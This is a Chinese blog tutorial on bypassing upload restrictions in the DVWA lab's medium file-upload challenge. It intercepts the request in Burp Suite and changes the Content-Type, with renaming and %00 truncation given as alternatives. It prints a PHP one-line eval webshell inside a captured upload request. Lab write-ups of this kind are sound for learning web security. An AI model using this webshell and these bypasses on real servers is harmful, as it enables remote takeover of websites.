截取HTTP请求
很多网站为了减少服务器端的压力,在后台方面减少验证,而只在web前端使用Javascript进行验证,殊不知这样大大增加了安全隐患。在渗透测试中经常会进行HTTP请求的截取来发现一些隐秘的漏洞。例如:绕过Javascript验证、发现隐藏标签内容等。
在本文中我使用DVWA靶场中的文件上传漏洞中级,来进行前端验证的绕过。
1、搭建靶场
1)安装phpstudy集成环境
下载地址:https://www.xp.cn/

2)搭建DVWA靶场

3)用php写个一句话木马用来获取webshll

2、进入靶场开始绕过
1)我们先直接上传木马看看能否成功


可以看到上传失败,下方红色提示:您的图片未上传。我们只能接受 JPEG 或 PNG 图像。
因为我上传的木马是.php格式的,它对文件格式做了过滤只允许.jpeg或.png文件上传。
2)我们用burpsuite抓包看看他的请求包是怎样的

100000
------WebKitFormBoundary9vBhdeU4CHZbAh1Z
Content-Disposition: form-data; name="uploaded"; filename="test.php"
Content-Type: application/octet-stream
<?php @eval($_POST[369]);?>
------WebKitFormBoundary9vBhdeU4CHZbAh1Z
Content-Disposition: form-data; name="Upload"
Upload
------WebKitFormBoundary9vBhdeU4CHZbAh1Z--
通过burp抓包分析,它通过" Content-Type"这个属性来判断是否为规定上传的文件格式。那我们修改这个格式为image/jpeg上传

上传成功并且返回了上传文件的路径


3、其他方法
1)上传文件名是"123.jpeg"的文件,随后在burp里面修改文件名,而不用修改" Content-Type "的内容,也可以实现文件上传。
2)在php版本小于5.3.4的服务器中,当Magic_quote_gpc选项为off时,可以在文件名中使用%00截断。
上面这两种方法我都尝试过,都可以成功,之后的步骤就是使用蚁剑或菜刀连接了,我就不写了,主要目的是通过截取http请求绕过前端javascript验证,这种方法很实用

588

被折叠的 条评论
为什么被折叠?



